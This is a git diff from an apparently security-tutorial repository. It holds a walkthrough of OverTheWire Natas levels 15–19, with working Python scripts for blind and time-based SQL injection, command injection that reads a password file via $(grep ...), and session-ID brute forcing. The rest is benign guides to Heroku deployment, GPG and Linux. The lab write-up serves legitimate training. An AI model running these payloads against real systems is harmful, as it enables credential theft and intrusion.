'natas15', ''); + mysql_select_db('natas15', $link); + $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\""; + if(array_key_exists("debug", $_GET)) { + echo "Executing query: $query
"; + } + $res = mysql_query($query, $link); + if($res) { + if(mysql_num_rows($res) > 0) { + echo "This user exists.
"; + } else { + echo "This user doesn't exist.
"; + } + } else { + echo "Error in query.
"; + } + mysql_close($link); +} else { +?> +``` + +We can't just modify the query to return a record because it won't accept **"**. + +However, additional information about the table's proprieties is enough for us! We are going to brute force it! + +#### Stating the Attack: + +If we check the existence of the users *nata15* or *natas17*, we get: + +> The user doesn't exist. + +However, if we check for *natas16* we verify that this user exists! Now we just need a password. + +Since checking this *natas16* will always return true, we can inject another clause to the query using the keyword AND: + + +``` +SELECT * from users where username="natas16" AND our_exploit +``` + +To pick this additional clause, we look at the [SQL wildcards and keywords] + +We can use the SQL function [SUBSTRING] and the symbol **%** to compare strings. For example, the following checks whether there is an **a** in the third position of the variable password: + + + +[SQL wildcards and keywords]: http://www.w3schools.com/sql/sql_wildcards.asp +[SUBSTRING]: http://www.1keydata.com/sql/sql-substring.html + +``` +AND SUBSTRING(password,3,1) = BINARY "a" +``` + +If SUBSTRING returns false, the entire query becomes false because of the **AND**, and we see the message: + +> This user doesn’t exist. + +If it returns true, we see + +> This user exists. + +Beautiful. + +#### Crafting the attack: + +We use Python's [request] library to craft our attack: + +[request]: http://docs.python-requests.org/en/latest/user/quickstart/ + +```python +import requests +import string + +def brute_force_password(LENGTH, AUTH, CHARS, SQL_URL1, SQL_URL2, KEYWORD): + password = '' + for i in range(1, LENGTH+1): + for j in range (len(CHARS)): + r = requests.get( ( SQL_URL1 + str(i) + SQL_URL2 + CHARS[j] ), auth=AUTH) + print r.url + if KEYWORD in r.text: + password += CHARS[j] + print("Password so far: " + password) + break + return password + +if __name__ == '__main__': + # authorization: login and password + AUTH = ('natas15', '*******************************') + + # BASE64 password and 32 bytes + CHARS = string.ascii_letters + string.digits + LENGTH = 32 + + # crafted url option 1 + SQL_URL1 = 'http://natas15.natas.labs.overthewire.org?username=natas16" AND SUBSTRING(password,' + SQL_URL2 = ',1) LIKE BINARY "' + KEYWORD = 'exists' + + print(brute_force_password(LENGTH, AUTH, CHARS, SQL_URL1, SQL_URL2, KEYWORD)) +``` + +After around 10 minutes we have our password. + +### Level 16: OS Command Injection III + + + +This level starts with a searching form: + +![cyber](http://i.imgur.com/kMHZzZ9.png) + +The source code is similar to the 9th and 10th levels: +``` +
+
+
+``` + +The difference now is that the code is being hygienized for **`**, **"**, and **'**. The old attack adding **""** won't work. + +We need to figure out what else we can use. + + +Bash has a feature called [command substitution], where commands can be passed with: +``` +$(command) +``` + +For example, the date command: + +```sh +$ MY_CMD="$(date)" +$ echo $MY_CMD +Wed Oct 14 20:23:41 EDT 2014 +``` + +[command substitution]: http://www.tldp.org/LDP/abs/html/commandsub.html + +#### Stating the attack: + +We are going to use command substitution to craft command in the variable *$key*, which lies inside: + +``` +grep -i \"$key\" dictionary.txt +``` +We are going to add another grep! Let's call it *grep II*. + +This time we will give it the flag ```-E``` to allow the use of regular expressions. + + +So, for example, we can use the *regex wildcard* **.\*** to search for a char (say *a*) in the password string: + + +``` +$(grep -E ^a.* /etc/natas_webpass/natas17)banana +``` + +If *grep II* finds a match, it returns the char. In the other case, it won't return any output. + +Once *grep II* is over, *grep I* will do the regular search for the pattern we passed (banana). + +If *grep II* didn't return anything, a banana will be banana. If *grep II* returns a match, a banana will have this extra string added to it (abanana). + +Now we can extend this logic to each char in the password string. + +#### Crafting the attack: + +By inspection, we see that the crafted URL to check, say, *a* in the first char, should look like this: + +> http://natas16.natas.labs.overthewire.org/?needle=$(grep%20-E%20^a.*%20/etc/natas_webpass/natas17)banana&submit=Search + +So we can write the following script: + + +```python +import requests +import string + +def brute_force_password(LENGTH, AUTH, CHARS, URL1, URL2): + password = '' + for i in range(1, LENGTH+1): + for j in range (len(CHARS)): + print("Position %d: Trying %s ..." %(i, CHARS[j])) + r = requests.get( ( URL1 + password + CHARS[j] + URL2 ), auth=AUTH) + if 'bananas' not in r.text: + password += CHARS[j] + print("Password so far: " + password) + break + return password + +if __name__ == '__main__': + # authorization: login and password + AUTH = ('natas16', '****************************') + + # BASE64 password and 32 bytes + CHARS = string.ascii_letters + string.digits + LENGTH = 32 + + # crafted url + URL1 = 'http://natas16.natas.labs.overthewire.org?needle=$(grep -E ^' + URL2 = '.* /etc/natas_webpass/natas17)banana&submit=Search' + + print(brute_force_password(LENGTH, AUTH, CHARS, URL1, URL2)) +``` + + + +Around 10 minutes later, we get our password. + + + +### Level 17: SQL Injection III + + + +This level starts with a username search similar from the 14th and 15th levels: + + +``` +/* +CREATE TABLE `users` ( + `username` varchar(64) DEFAULT NULL, + `password` varchar(64) DEFAULT NULL +); +*/ +if(array_key_exists("username", $_REQUEST)) { + $link = mysql_connect('localhost', 'natas17', ''); + mysql_select_db('natas17', $link); + $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\""; + if(array_key_exists("debug", $_GET)) { + echo "Executing query: $query
"; + } + $res = mysql_query($query, $link); + if($res) { + if(mysql_num_rows($res) > 0) { + //echo "This user exists.
"; + } else { + //echo "This user doesn't exist.
"; + } + } else { + //echo "Error in query.
"; + } + mysql_close($link); +} else { +?> +``` + + +The difference now is that the echo commands are commented off. We can't use the same method as before to check whether we got a right char in the password. + +What other ways we can have binary indicator? + +We can play with time! + +#### Stating the Attack: + +Luckily, MySQL has a query [sleep()] that delays the next command for a number of seconds. We can use this as an injected command at the end of our former exploits: + +[sleep()]: http://dev.mysql.com/doc/refman/5.0/en/miscellaneous-functions.html#function_sleep + +``` +AND SUBSTRING(password,3,1)) LIKE BINARY AND SLEEP(5) AND "1"="1 +``` + +Notice that since SLEEP() does not carry a **"** we use the *always true* clause to close the **"** added by the server. + + +A crafted URL should look like this: + +> http://natas15.natas.labs.overthewire.org/?username=natas16%22%20AND%20SUBSTRING(password,1,1)%20LIKE%20BINARY%20%22d%22%20AND%20SLEEP(320)%20AND%20%221%22=%221 + +#### Crafting the Attack: + +The new script is: + +```python +import requests +import string + +def brute_force_password(LENGTH, AUTH, CHARS, SQL_URL1, SQL_URL2): + password = '' + for i in range(1, LENGTH+1): + for j in range (len(CHARS)): + r = requests.get( ( SQL_URL1 + str(i) + SQL_URL2 + CHARS[j] + SQL_URL3 ), auth=AUTH) + time = r.elapsed.total_seconds() + print("Position %d: trying %s... Time: %.3f" %(i, CHARS[j], time)) + #print r.url + if time >= 9: + password += CHARS[j] + print("Password so far: " + password) + break + return password + +if __name__ == '__main__': + # authorization: login and password + AUTH = ('natas17', '****************************') + + # BASE64 password and 32 bytes + CHARS = string.ascii_letters + string.digits + LENGTH = 32 + + # crafted url + SQL_URL1 = 'http://natas17.natas.labs.overthewire.org?username=natas18" AND SUBSTRING(password,' + SQL_URL2 = ',1) LIKE BINARY "' + SQL_URL3 = '" AND SLEEP(10) AND "1"="1' + + print(brute_force_password(LENGTH, AUTH, CHARS, SQL_URL1, SQL_URL2)) +``` + +Around 15 minutes later, I got the password. + + + +### Level 18: Hijacking Session ID + + + +The 18th level starts with a login form, just like the levels before it. The source code is much more intricate though. + +First, we see the declaration of the size of the id. This is important if we want to brute force the solution: + +``` +$maxid = 640; // 640 should be enough for everyone +``` + +Then we have a function that checks whether a variable *$id* is a number with the PHP function [is_numeric]: + +[is_numeric]: http://php.net/manual/en/function.is-numeric.php + +``` +function isValidID($id) { /* {{{ */ + return is_numeric($id); +} +``` + + +Then we have this main object: +``` +$showform = true; +if(my_session_start()) { + print_credentials(); + $showform = false; +} else { + if(array_key_exists("username", $_REQUEST) && array_key_exists("password", $_REQUEST)) { + session_id(createID($_REQUEST["username"])); + session_start(); + $_SESSION["admin"] = isValidAdminLogin(); + debug("New session started"); + $showform = false; + print_credentials(); + } +} +if($showform) { +?> +``` +The next function create an random id number with the value defined by *$maxid*: +```php +function createID($user) { /* {{{ */ + global $maxid; + return rand(1, $maxid); +} +``` + +This checks whether the function *my_session_start()* is true: + +``` +function my_session_start() { /* {{{ */ + if(array_key_exists("PHPSESSID", $_COOKIE) and isValidID($_COOKIE["PHPSESSID"])) { + if(!session_start()) { + debug("Session start failed"); + return false; + } else { + debug("Session start ok"); + if(!array_key_exists("admin", $_SESSION)) { + debug("Session was old: admin flag set"); + $_SESSION["admin"] = 0; // backwards compatible, secure + } + return true; + } + } + return false; +} +``` + + +In the case it's true, a function that prints the credentials is called, printing our password: + +``` +function print_credentials() { /* {{{ */ + if($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1) { + print "You are an admin. The credentials for the next level are:
"; + print "
Username: natas19\n";
+ print "Password:
"; + } else { + print "You are logged in as a regular user. Login as an admin to retrieve credentials for natas19."; + } +} +``` + +If *%my_session* is not true, it will look to the HTTP request and search for username and password. If it finds them, it creates a session id: + +``` +function isValidAdminLogin() { /* {{{ */ + if($_REQUEST["username"] == "admin") { + /* This method of authentication appears to be unsafe and has been disabled for now. */ + //return 1; + } + return 0; +``` + + + + + + +So, in summary, we have a function that starts the session, first checking if the session id is in the cookie, and if this session id is a number. If true, it checks if it's a fresh session. Then, it checks if the word *admin* is in [SESSION_ID]. If not, it invalidates the session. + +[SESSION_ID]: http://en.wikipedia.org/wiki/Session_ID + +If the SESSION_ID is the admin session ID, the password for the next is shown. + +After that, it calls PHP's [session_starts()]. + +The session ID is given by the variable *PHPSESSID*, and that's what we are going to brute force to get our password. + + + + + + +The variable [$_REQUEST] is an array that by default contains the contents of *$_GET*, *$_POST* and *$_COOKIE*. + +[$_REQUEST]: http://php.net/manual/en/reserved.variables.request.php + +[session_starts()]: http://php.net/manual/en/function.session-start.php + +#### Crafting the attack: + +We write the following script: + +```python +import requests + +def brute_force_password(AUTH, URL, PAYLOAD, MAXID): + for i in range(MAXID): + HEADER ={'Cookie':'PHPSESSID=' + str(i)} + r = requests.post(URL, auth=AUTH, params=PAYLOAD, headers=HEADER) + if "You are an admin" in r.text: + print(r.text) + print(r.url) + print(str(i)) + +if __name__ == '__main__': + AUTH = ('natas18', '*************************') + URL = 'http://natas18.natas.labs.overthewire.org/index.php?' + + PAYLOAD = ({'debug': '1', 'username': 'user', 'password': 'pass'}) + MAXID = 640 + + brute_force_password(AUTH, URL, PAYLOAD, MAXID) +``` + +After a few minutes, we get our password. + + + + + + + + + + + + + + + + + + + +### Level 19: Hijacking Session ID II + + + +This level looks exactly like the previous except that it has the following message: + +> This page uses mostly the same code as the previous level, but session IDs are no longer sequential ... + +![cyber](http://i.imgur.com/OQ7LATt.png) + + +This time we have no access to the source code to see how the session IDs are created. However, we have access to the values in the cookie which are created by the session. + +We write the following snippet: + +```python +HEADER ={'Cookie':'PHPSESSID=' + str(i)} +r = requests.post(URL, auth=AUTH, params=PAYLOAD, headers=HEADER) +print(i) +print(HEADER[1]) +``` + +This produces the following output: + +``` +0 +{'PHPSESSID': '3236312d75736572'} +1 +{'PHPSESSID': '3136372d75736572'} +2 +{'PHPSESSID': '3534342d75736572'} +3 +{'PHPSESSID': '3238352d75736572'} +4 +{'PHPSESSID': '3334332d75736572'} +(...) +``` + +So the session ID is an hexadecimal number. Let's decode it: + +```python +id_hex = requests.utils.dict_from_cookiejar(r.cookies)['PHPSESSID'] +print(id_hex.decode('hex')) +``` + +Mmmm, interesting: + +``` +0 +548-user +1 +275-user +2 +237-user +3 +90-user +4 +535-user +(...) +``` + +The session ID is really a random number (below 640) attached to the given username. That's easy. + +#### Crafting the attack: + + +We write the following script: + +```python +import requests + +def brute_force_password(AUTH, URL, PAYLOAD, MAXID): + for i in range(MAXID): + HEADER ={'Cookie':'PHPSESSID=' + (str(i) + '-admin').encode('hex')} + r = requests.post(URL, auth=AUTH, params=PAYLOAD, headers=HEADER) + print(i) + if "You are an admin" in r.text: + print(r.text) + print(r.url) + +if __name__ == '__main__': + + AUTH = ('natas19', '***********************') + URL = 'http://natas19.natas.labs.overthewire.org/index.php?' + + PAYLOAD = ({'debug': '1', 'username': 'admin', 'password': 'pass'}) + MAXID = 640 + + brute_force_password(AUTH, URL, PAYLOAD, MAXID) +``` + +And we get our password in the 501st attempt. Awesome. + + + +_____________________ + +That's it. The [source code is available] as usual. + + +Hack all the things! + +[source code is available]: https://github.com/bt3gl/CTFs-Gray-Hacker-and-PenTesting/tree/master/Web_Exploits diff --git a/Cloud_and_K8s_Hacking/intro_heroku.md b/Cloud_and_K8s_Hacking/intro_heroku.md new file mode 100644 index 0000000..577e664 --- /dev/null +++ b/Cloud_and_K8s_Hacking/intro_heroku.md @@ -0,0 +1,203 @@ +# Deploying a Flask App at Heroku + + +I was playing with Flask, and I wrote my own [Anti-Social Network](https://anti-social.herokuapp.com/). + +Heroku platform is very flexible, and it supports several programming languages. To +deploy an application to Heroku, use Git to push the application to Heroku’s server. + +# Running in a Production Server + +Heroku does not provide a web server, but it expects it to start their own servers and listen on the port number set in environment variable PORT. Flask will perform very poorly because it was not designed to run in a production environment. To improve this, you may use a production-ready web server such as Gunicorn. + +``` +$ pip install gunicorn +``` + +Now, run your app with: + +``` +$ gunicorn manage:app +``` + +Gunicorn uses port 8000 instead of 5000. + +# Heroku Setting Up + +### Create an account at Heroku.com + +If you haven't done it yet, remember: you will be able to keep up to five applications running (you can always delete them if you need). + +### Install Git and Heroku Toolbelt + +You can find instructions at Heroku.com. + +For example, if you are in an AWS EC2 Ubuntu instance, you can use: + +``` +$ sudo apt-get install -y git-core +$ wget -qO- https://toolbelt.heroku.com/install-ubuntu.sh | sh +``` + +You can check if it worked with: + +``` +$ which git +$ which heroku +``` + +Now, login at Heroku: + +``` +$ heroku login +``` + +## Authorize your Machine at Heroku + +### Create and add an SSH Key at Heroku: + +``` +$ ssh-keygen -t rsa +$ heroku keys:add +``` + +The public and private keys will be at ```~/.ssh```. I always recommend backup your keys. Never share your private key. + +### Creating a Git Repository + +Heroku's push/commits work just like Git. But instead of using the "origin" you use "heroku" (you can verify this later at .git/refs/remotes/). In other words, your project's control version (development) is done by using: + +``` +$ git push origin master (or any branch you like) +``` + +and the deployment at Heroku (production) is done using: + +``` +$ git push heroku master (or any branch you like) +``` + +In the root of your project, go ahead, and create a Git repository, commit, add, push: + +``` +$ git init +$ git add -A +$ git commit -m "First commit" +$ git push origin master +``` + +### Creating an App + +Now, let's create our app at Heroku: + +``` +$ heroku create +``` + +You can check all your current applications with: + +``` +$ heroku apps +``` + +### Addons and Environment Variables + +Now it's time to add the addons and the environment variables to your app at the Heroku server. For the app I mentioned in the beginning, I type: + +``` +$ heroku addons:add heroku-postgresql:dev +$ heroku pg:promote HEROKU_POSTGRESQL_ONYX_URL +$ heroku config:set MAIL_USERNAME="" +$ heroku config:set MAIL_PASSWORD="" +``` + +You can always check your configuration with: +``` +$ heroku config +``` + +### Adding Requirements + +Heroku needs to know what libraries and packages it needs to install to be able to run your application. For this, create a file requirements.txt in the root of your app, with all the libraries from your environment. One way of doing this is by: + +``` +$ cat pip freeze >> requirements.txt +``` + +#### Adding Procfile + +Next, Heroku needs to know the command to use to start your app. This is given by a file called Procfile. The content should be: + +``` +web gunicorn manage:app +``` +(if this is how you run your application). + +In the Procfile, each line has a task name, a colon, and the command that runs the task. We use web here because Heroku recognizes it as the task that starts the webserver. Heroku gives this task a PORT environment variable, and set it to the port in which the application needs to listen for requests. + +### Using Foreman to Emulate Heroku + +The Heroku Toolbelt includes Foreman, used to run the app locally through the Procfile for testing purposes. The environment variables set at Heroku must be defined locally. Just create a file var.env with this information: + +``` +FLASK_CONFIG=heroku +MAIL_USERNAME= +MAIL_PASSWORD= +``` + +Foreman run is used to run commands under the environment of the application. Foreman start reads the Procfile and executes the tasks in it: + +``` +$ foreman run python manage.py deploy +$ foreman start +``` + +### Configuring Logging + +In Heroku, logs are written to stdout or stderr. In my app, I added the logging configuration to a class in my app's ```config.py``` file: + +``` +class HerokuConfig(ProductionConfig): + @classmethod + def init_app(cls, app): + ProductionConfig.init_app(app) + + import logging + from logging import StreamHandler + file_handler = StreamHandler() + file_handler.setLevel(logging.WARNING) + app.logger.addHandler(file_handler) +``` + +To let Heroku know what configuration it should use, I add this environment variable: +``` +$ heroku config:set FLASK_CONFIG=heroku +``` + +Now if something goes wrong when you deploy, you can always check the log: + +``` +$ heroku logs +``` + +### Deploying! + +If everything is well-done, it's time to deploy your application. Since you already committed your app before, you just need to push it to Heroku: + +``` +$ git push heroku master +``` + +In my app, I have a script for the deployment (such as taking care of database and other setups for production). So, additionally, I run: + +``` +$ heroku run python manage.py deploy +$ heroku restart +``` + +That's it! The app should be running at ```< app-name >.herokuapp.com```. + + + +--- +Enjoy! This article was originally posted [here](https://coderwall.com/p/pstm1w/deploying-a-flask-app-at-heroku), and it has over 43k views! diff --git a/Cryptography/everything_GPG.md b/Cryptography/everything_GPG.md new file mode 100644 index 0000000..ad3017a --- /dev/null +++ b/Cryptography/everything_GPG.md @@ -0,0 +1,222 @@ +# Intro to OpenPGP & GPG + +[Pretty Good Privacy](http://en.wikipedia.org/wiki/Pretty_Good_Privacy) (PGP) is a model that provides cryptographic privacy and authentication for data communication. It was created by [Phil Zimmermann](http://en.wikipedia.org/wiki/Phil_Zimmermann) in 1991. Today, PGP is a [company](http://en.wikipedia.org/wiki/PGP_Corporation) that sells a proprietary encryption program, [OpenPGP](http://www.openpgp.org/) is the open protocol that defines how PGP encryption works, and [GnuGP](https://www.gnupg.org/) is the free software. + + +The distribution of PGP keys can be done using the concept of [web of trust](http://en.wikipedia.org/wiki/Web_of_trust). It is a decentralized way of establishing the authenticity of a public key and its owner. If you want a cute (ludic) picture of the web of trust, check [Cory Doctorow](https://twitter.com/doctorow)'s book [Little Brother](http://craphound.com/littlebrother/). + + +Almost 15 years after its creation, [PGP continues to be *pretty good*](https://firstlook.org/theintercept/2014/10/28/smuggling-snowden-secrets/). But there is still a [need for new solutions](http://blog.cryptographyengineering.com/2014/08/whats-matter-with-pgp.html) (and they appear to be [coming soon](http://googleonlinesecurity.blogspot.com/2014/06/making-end-to-end-encryption-easier-to.html)). Perhaps the main issue with PGP is its persistence. If one key is compromised, any message from the past can be read. That's where the concept of [perfect forward secrecy ](http://en.wikipedia.org/wiki/Forward_secrecy) comes in play, but this is a subject to another post. + +Meanwhile, I wrote this tutorial, and I hope you find it fun. Btw, [this post was first published at CodeWall and it had 1.5k+ views at the time](https://coderwall.com/p/ajtlqa/getting-started-with-pgp-gpg). + + + + + + +### I. Creating GPG keys + +Type the following in the terminal: + +```sh +$ gpg --gen-key +``` + +Chose [RSA](http://en.wikipedia.org/wiki/RSA_(cryptosystem)) with 4096 bits long and expiration up to 5 years. Use a [strong passphrase](https://www.eff.org/wp/defending-privacy-us-border-guide-travelers-carrying-digital-devices#passphrase) (keep it safe since it cannot be recovered). + +### II. Backup your Private Key + +Save it with your soul: + +```sh +$ gpg --export-secret-keys --armor YOUR_EMAIL > YOUR_NAME-privkey.asc +``` + +### III. Sharing your key + +There are several ways you can share or publish your public key: + +#### By sharing the key's fingerprint + +The key's fingerprint is the same as its signature. Each PGP key has a unique fingerprint that allows you to confirm to others that they have received your actual public key without tampering. A fingerprint is a more convenient way to represent a key uniquely. + +To check the fingerprint of any key that you have in your keyring, type: + +```sh +$ gpg --fingerprint EMAIL +``` + +#### By sending the ASCII file +You can copy your key to a file to be shared: +```sh +$ gpg --export --armor YOUR_EMAIL > YOUR_NAME-pubkey.asc +``` + +#### By publishing it in a public key server +You can export your key to the [GnuPG public key server](keys.gnupg.net). For this, use your key's name (the hexadecimal number in front of the key): + +```sh +$ gpg --send-key KEY_NAME +``` + +You can also export it to [pgp.mit.edu](pgp.mit.edu): + +```sh +$ gpg --keyserver hkp://pgp.mit.edu --send-key KEY_NAME +``` + +### V. Importing Someone's Key + +There are many ways you can import someone's public key: + +#### By a shared file +If you have the ASCII file, you can type: + +```sh +$ gpg --import PUBKEY_FILE +``` + + +#### By Public Key Server +To search for someone's key in the public key server, type: + +```sh +$ gpg --search-keys NAME +``` + +Note: this is **not** very safe since you can't be sure of the key's authenticity. + +### V. Signing a key: The Web of Trust + +Signing a key tells your software that you trust the key that you have been provided (you have verified that it is associated with the person in question). + +To sign a key type: + +```sh +$ gpg --sign-key PERSON_EMAIL +``` + +You should allow the person whose key you are signing to enjoy the advantages of your trusted relationship, done by sending her back the signed key: + +```sh +$ gpg --export --armor PERSON_EMAIL +``` + +When you received a similar *trusted* key, you can import it into your GPG database: + +```sh +$ gpg --import FILENAME +``` + +### VI. Other Useful Commands + +#### To delete a key from your keyring: +```sh +$ gpg --delete-key-name KEY_NAME +``` + +#### To edit a key (for example, the expiration date): + +```sh +$ gpg --edit KEY_NAME +``` + + + +#### If you have more than one key: + +Edit ```~/.gnupg/gpg.conf``` with your favorite key: + +``` +default-key KEY_NAME +``` + +#### Keep your keys fresh: + +```sh +$ gpg --refresh-keys +``` + + + +#### To list your keys: + +```sh +$ gpg --list-keys +``` + +#### And of course: +```sh +$ man gpg +``` + + +### VII. Encrypting and Decrypting Messages + + +With someone's **public key**, you can **encrypt** messages that can only be decrypted with her secret key. You can also **verify signatures** that was generated with her secret key. + +On the other hand, with your secret key, you can **decrypt** messages that were encrypted using your public key. You can also and **sign messages**. + +With GPG, you encrypt messages using the ```--encrypt``` flag. + +The command below encrypts the message signing with your private key (to guarantee that is coming from you). It also generates the message in a text format, instead of raw bytes: + +```sh +$ gpg --encrypt --sign --armor -r PERSON_EMAIL FILE_TO_BE_ENCRYPTED +``` + +If you want to be able to read this message with your own email address, you should add another recipient flag ```-r``` with your email address. + +To decrypt a message, type: + +```sh +$ gpg FILENAME +``` + + +### VIII. Revoking a key + +Whenever you need to revoke a key (because it might be compromised, for example), you can generate a revocation certificate with: + +```sh +$ gpg --output my_revocation.asc --gen-revoke KEY_NAME +``` + +To import the revocation into your keyring: + +```sh +$ gpg --import my_revocation.asc +``` + +Finally, this command sends the revoked key to the public key server: + +```sh +$ gpg --keyserver pgp.mit.edu --send-keys KEY_NAME +``` + + + +---- + + +## Final Comments + +If you prefer a GUI instead of the command line, I strongly recommend [seahorse](https://apps.fedoraproject.org/packages/seahorse/bugs). It makes it really easy to manage all your keys (not only OpenPGP) and passwords. + +Another nice (alpha) project is [keybase.io](https://keybase.io/). It's a web of trust social network, where you can sign your key with your public profiles. Check [mine here](https://keybase.io/bt3). Encryption and decryption can be done in the command line with their [node.js](https://keybase.io/docs/command_line) application. I don't trust uploading my private key anywhere, but I do think that the idea is better than a simple public key server. + + + +Finally, a word about browser plugins: although there are several of them to encrypt webmail with OpenPGP, such as [mymail-crypt](https://chrome.google.com/webstore/detail/mymail-crypt-for-gmail/jcaobjhdnlpmopmjhijplpjhlplfkhba?hl=en-US) or [Mailvelope](https://www.mailvelope.com/), I particularly don't recommend this solution if your message is very sensitive. + +If you are serious about ensuring your long-term privacy, the safest way to go is to use a text editor to write your email message, encrypting the message outside of the web browser, and then cutting and pasting into your webmail interface. This will guarantee that only the recipient will be able to read your email. + +If you really need something in your browser, the creator of [Cryptocat](https://crypto.cat/) recently released [minilock](https://minilock.io/). This tool uses [Curve25519 elliptic curve cryptography](http://en.wikipedia.org/wiki/Curve25519) (the same as in Cryptocat) so that the public keys are much shorter (and easier to share). Remember, it's a new app, so it might not yet be the best choice for the high-stakes environment (but it's worth keeping tabs on this project). + +--- + +## Further Readings + +- [The GNU Privacy Handbook](https://www.gnupg.org/gph/en/manual.html) diff --git a/IOCs/.DS_Store b/Forensics/IOCs/.DS_Store similarity index 100% rename from IOCs/.DS_Store rename to Forensics/IOCs/.DS_Store diff --git a/IOCs/README.md b/Forensics/IOCs/README.md similarity index 100% rename from IOCs/README.md rename to Forensics/IOCs/README.md diff --git a/IOCs/kaspersky_careto_C2.txt b/Forensics/IOCs/kaspersky_careto_C2.txt similarity index 100% rename from IOCs/kaspersky_careto_C2.txt rename to Forensics/IOCs/kaspersky_careto_C2.txt diff --git a/IOCs/kaspersky_careto_domains.txt b/Forensics/IOCs/kaspersky_careto_domains.txt similarity index 100% rename from IOCs/kaspersky_careto_domains.txt rename to Forensics/IOCs/kaspersky_careto_domains.txt diff --git a/IOCs/kaspersky_careto_files.txt b/Forensics/IOCs/kaspersky_careto_files.txt similarity index 100% rename from IOCs/kaspersky_careto_files.txt rename to Forensics/IOCs/kaspersky_careto_files.txt diff --git a/IOCs/kaspersky_careto_files_no-env-vars.txt b/Forensics/IOCs/kaspersky_careto_files_no-env-vars.txt similarity index 100% rename from IOCs/kaspersky_careto_files_no-env-vars.txt rename to Forensics/IOCs/kaspersky_careto_files_no-env-vars.txt diff --git a/IOCs/kaspersky_careto_registry.txt b/Forensics/IOCs/kaspersky_careto_registry.txt similarity index 100% rename from IOCs/kaspersky_careto_registry.txt rename to Forensics/IOCs/kaspersky_careto_registry.txt diff --git a/Linux_Hacking/README.md b/Linux_Hacking/README.md index 75a4fae..01db2a2 100644 --- a/Linux_Hacking/README.md +++ b/Linux_Hacking/README.md @@ -1,6 +1,1430 @@ -# Linux Hacking +# The Ultimate Linux Guide for Hackers ;) + + +## The Linux Filesystem + +* Let's start getting an idea of our system. The *Linux filesystem* is composed of several system directories locate at **/**: + +``` +$ ls / +``` + +![cyber](http://i.imgur.com/qhYyiK8.png) + +* You can verify their sizes and where they are mounted with: + +``` +$ df -h . +Filesystem Type Size Used Avail Use% Mounted on +/dev/mapper/fedora-home ext4 127G 62G 59G 51% /home +``` + + +* The filesystem architecture is generally divided into the following folders: + +### /bin, /sbin and /user/sbin +* **/bin** is a directory containing executable binaries, essential commands used in single-user mode, and essential commands required by all system users. + +* **/sbin** contains commands that are not essential for the system in single-user mode. + +### /dev +* **/dev** contains device nodes, which are a type of pseudo-file used by most hardware and software devices (except for network devices). + +* The directory also contains entries that are created by the **udev** system, which creates and manages device nodes on Linux (creating them dynamically when devices are found). + +### /var +* **/var** stands for *variable* and contains files that are expected to be changing in size and content as the system is running. + +* For example, the system log files are located at **/var/log**, the packages and database files are located at **/var/lib**, the print queues are located at **/var/spool**, temporary files stay inside **/var/tmp**, and networks services can be found in subdirectories such as **/var/ftp** and **/var/www**. + +### /etc + +* **/etc** is short for *et cetera* and contains the system configuration files. It contains no binary programs, but it might have some executable scripts. + +* For instance, the file **/etc/resolv.conf** tells the system where to go on the network to obtain the hostname of some IP address (*i.e.* DNS). + +* The **/etc/passwd** file is the authoritative list of users on any Unix system. It does not contain the passwords: the encrypted password information was migrated into **/etc/shadow**. + +* The **/etc/hosts** contains a list of hostname to IP address mappings, which can be used to assign names to servers, independently of the public DNS service. + +### /lib +* **/lib** contains libraries (common code shared by applications and needed for them to run) for essential programs in **/bin** and **/sbin**. + +* This library filenames either start with ```ld``` or ```lib``` and are called *dynamically loaded libraries* (or shared libraries). + + +### /boot + +* **/boot** contains the few essential files needed to boot the system. + +* For every alternative kernel installed on the system, there are four files: + + * ```vmlinuz```: the compressed Linux kernel, required for booting. + + * ```initramfs``` or ```initrd```: the initial RAM filesystem, required for booting. + + * ```config```: the kernel configuration file, used for debugging. + + * ```system.map```: the kernel symbol table. + + * [GRUB](http://null-byte.wonderhowto.com/how-to/hack-like-pro-linux-basics-for-aspiring-hacker-part-21-grub-bootloader-0154965/) files can also be found here (in /boot/grub/grub.cfg) + + + +### /opt +* Optional directory for application software packages, usually installed manually by the user. + +### /tmp +* **/tmp** contains temporary files that are erased in a reboot. + +### /usr + +* **/usr** contains multi-user applications, utilities and data. The common subdirectories are: + * **/usr/include**: header files used to compile applications. + + * **usr/lib**: libraries for programs in **usr/(s)bin**. + + * **usr/sbin**: non-essential system binaries, such as system daemons. In modern Linux systems, this is linked together to **/sbin**. + + * **usr/bin**: primary directory of executable commands of the system. + + * **usr/share**: shaped data used by applications, generally architecture-independent. + + * **usr/src**: source code, usually for the Linux kernel. + + * **usr/local**: data and programs specific to the local machine, things that apply to a computer rather than things provided by the operating system go. + +### /proc + +* **/proc** contains dynamically-created virtual filesystem that contains data about each running process and the system as a whole. + +--- +## /dev Specials + +* There exist files provided by the operating system that does not represent any physical device, but provide a way to access special features: + + * **/dev/null** ignores everything written to it. It's convenient for discarding the unwanted output. + + * **/dev/zero** contains an *infinite* number of zero bytes, which can be useful for creating files of a specified length. + + * **/dev/urandom** and **/dev/random** contain an infinite stream of operating-system-generated random numbers, available to any application that wants to read them. The difference between them is that the second guarantees strong randomness (it will wait until enough is available) and so it should be used for encryption, while the former can be used for games. + +* For example, to output random bytes, you can type: + +``` +$ cat /dev/urandom | strings +``` + + + +## The Kernel + + +* The **Linux Kernel** is the program that manages *input/output requests* from software, and translates them into *data processing instructions* for the *central processing unit* (CPU). + +* To find the Kernel information you can type: + +``` +$ cat /proc/version +Linux version 3.14.9-200.fc20.x86_64 (mockbuild@bkernel02.phx2.fedoraproject.org) (gcc version 4.8.3 20140624 (Red Hat 4.8.3-1) (GCC) ) #1 SMP Thu Jun 26 21:40:51 UTC 2014 +``` + +* You can also print similar system information with the specific command to print system information, ```uname```. The flag **-a** stands for all: + +``` + $ uname -a + Linux XXXXX 3.14.9-200.fc20.x86_64 #1 SMP Thu Jun 26 21:40:51 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux +``` + +* For instance, we might be interested in **checking whether you are using the latest Kernel**. You can do this by checking whether the outputs of the following commands match: + +``` +$ rpm -qa kernel | sort -V | tail -n 1 +$ uname -r +``` + +* Additionally, for Fedora (and RPM systems) you can check what kernels are installed with: + +``` +$ rpm -q kernel +``` + + +--- +## Processes + +* A running program is called **process**. Each process has an **owner** (in the same sense as when we talk about file permissions below). + +* You can find out which programs are running with the **ps** command. This also gives the **process ID** or **PID**, which is a unique long-term identity for the process (different copies of a given program will have separate PIDs). + +* To put a job (process) in the background we either run it with **&** or we press CTRL-Z and then type **bg**. To 